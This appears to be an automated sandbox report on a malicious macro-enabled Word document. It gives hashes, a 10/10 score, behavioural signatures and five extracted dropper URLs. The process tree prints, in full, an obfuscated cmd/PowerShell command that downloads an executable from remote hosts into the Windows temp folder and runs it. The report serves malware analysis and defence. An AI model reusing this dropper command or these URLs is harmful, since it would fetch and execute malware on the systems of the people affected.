Overview

overview

10

Static

static

8

1bb948ea6a...0.docm

windows7_x64

10

1bb948ea6a...0.docm

windows10-2004_x64

10

Analysis

  • max time kernel
    100s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    07-06-2022 17:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1bb948ea6a642404c81eff109bd3bf4de8d17371bd084d3636e5638345cc5020.docm

  • Size

    94KB

  • MD5

    17160cfc8b8c0401f0d2063a615fb133

  • SHA1

    baba76bfcc698be2fd98574ba2bdcf894a9c3c16

  • SHA256

    1bb948ea6a642404c81eff109bd3bf4de8d17371bd084d3636e5638345cc5020

  • SHA512

    e88185760d15ff0c0eb7f83a111393f4bb309387f6533875958f9f5fb5208ad0b2566157b5986db4462711bb2982fa5ac10a4e84803e11c2e5a1073fe54fdf3c

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://japanijob.com/UUC8iEfIfb
exe.dropper

http://103.11.22.51/wp-content/uploads/yoarKX9
exe.dropper

http://13.126.28.98/hPwXcgCZBx
exe.dropper

http://159.65.146.232/ugitr4t4L
exe.dropper

http://159.65.65.213/iz1Cc1GhZ

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\1bb948ea6a642404c81eff109bd3bf4de8d17371bd084d3636e5638345cc5020.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4972
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c set x=pow&& set y=ersh&& set z=ell&& call %x%%y%%z% $Lbi2C = '$zmlXw8L = new-obj000ect -com000obj000ect wsc000ript.she000ll;$OeRVbsv = new-object sys000tem.net.web000client;$C8OLj = new-object random;$nrwmj = \"000h000t000t000p000://japanijob.com/UUC8iEfIfb,000h000t000t000p000://103.11.22.51/wp-content/uploads/yoarKX9,000h000t000t000p000://13.126.28.98/hPwXcgCZBx,000h000t000t000p000://159.65.146.232/ugitr4t4L,000h000t000t000p000://159.65.65.213/iz1Cc1GhZ\".spl000it(\",\");$MRBKOMiTz = $C8OLj.nex000t(1, 65536);$l1u8gi4t = \"c:\win000dows\tem000p\95.ex000e\";for000each($iGSfRnt in $nrwmj){try{$OeRVbsv.dow000nlo000adf000ile($iGSfRnt.ToS000tring(), $l1u8gi4t);sta000rt-pro000cess $l1u8gi4t;break;}catch{}}'.replace('000', $j3ciVLYh);$OXlJrGA7 = '';iex($Lbi2C);
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:4580
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell $Lbi2C = '$zmlXw8L = new-obj000ect -com000obj000ect wsc000ript.she000ll;$OeRVbsv = new-object sys000tem.net.web000client;$C8OLj = new-object random;$nrwmj = \"000h000t000t000p000://japanijob.com/UUC8iEfIfb,000h000t000t000p000://103.11.22.51/wp-content/uploads/yoarKX9,000h000t000t000p000://13.126.28.98/hPwXcgCZBx,000h000t000t000p000://159.65.146.232/ugitr4t4L,000h000t000t000p000://159.65.65.213/iz1Cc1GhZ\".spl000it(\",\");$MRBKOMiTz = $C8OLj.nex000t(1, 65536);$l1u8gi4t = \"c:\win000dows\tem000p\95.ex000e\";for000each($iGSfRnt in $nrwmj){try{$OeRVbsv.dow000nlo000adf000ile($iGSfRnt.ToS000tring(), $l1u8gi4t);sta000rt-pro000cess $l1u8gi4t;break;}catch{}}'.replace('000', $j3ciVLYh);$OXlJrGA7 = '';iex($Lbi2C);
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4668

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4668-143-0x00007FFE21DE0000-0x00007FFE228A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4668-142-0x00007FFE21DE0000-0x00007FFE228A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4668-141-0x00007FFE21DE0000-0x00007FFE228A1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4668-140-0x0000024A41680000-0x0000024A416A2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4972-134-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4972-136-0x00007FFE0AC70000-0x00007FFE0AC80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4972-138-0x000001B75CD80000-0x000001B75CD84000-memory.dmp

    Filesize

    16KB

    Download

  • memory/4972-135-0x00007FFE0AC70000-0x00007FFE0AC80000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4972-130-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4972-133-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4972-132-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4972-131-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4972-145-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4972-146-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4972-147-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4972-148-0x00007FFE0D5D0000-0x00007FFE0D5E0000-memory.dmp

    Filesize

    64KB

    Download